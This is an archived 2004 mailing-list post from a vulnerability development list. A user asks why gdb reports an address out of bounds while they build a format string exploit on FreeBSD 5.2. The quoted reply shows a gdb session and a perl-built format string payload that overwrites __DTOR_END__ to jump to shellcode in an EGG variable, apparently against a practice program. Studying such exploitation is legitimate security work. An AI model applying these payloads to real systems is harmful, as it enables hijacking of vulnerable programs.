Vulnerability Development mailing list archives
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT
From: Ganbold <ganbold () micom mng net>
Date: Mon, 02 Aug 2004 11:37:54 +0900
Thank you for quick answer. However when I try to get EGG in gdb I get: bash-2.05b$ uname -msr FreeBSD 5.2-CURRENT i386 bash-2.05b$ nm fmt_vuln | grep __DTOR_END__ 08049828 d __DTOR_END__ bash-2.05b$ ./getenvaddr EGG EGG is located at 0xbfbfe557 bash-2.05b$ gdb -q ./fmt_vuln (no debugging symbols found)...(gdb) (gdb) x/1s 0xbfbfe557 0xbfbfe557: <Address 0xbfbfe557 out of bounds> (gdb) What should I do in this case? Why it says "Address out of bounds"? Ganbold At 09:24 AM 31.07.2004, you wrote:
-bash-2.05b$ uname -msr FreeBSD 5.2.1-RC2 i386 -bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c -bash-2.05b$ nm fmt_vuln | grep __DTOR_END__ 08049848 d __DTOR_END__ -bash-2.05b$ gdb -q ./fmt_vuln (no debugging symbols found)...(gdb) (gdb) x/1s 0xbfbfedf5 0xbfbfedf5: "EGG=vlad902" (gdb) b * 0xbfbfedf9 Breakpoint 1 at 0xbfbfedf9 (gdb) run `perl -e 'print "\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" . "%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'` .. [*] test_val @ 0x0804979c = -72 0xffffffb8 (no debugging symbols found)...(no debugging symbols found)... Breakpoint 1, 0xbfbfedf9 in ?? () > Can somebody give me some hints, advices and guides? Only advice I can give you is do it by hand rather then having tools do it for you. Although while exploiting it beware, I found the stack is very quirky which is why I seem to have so many useless %x s' lieing around -vlad902
Current thread:
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT Ganbold (Aug 02)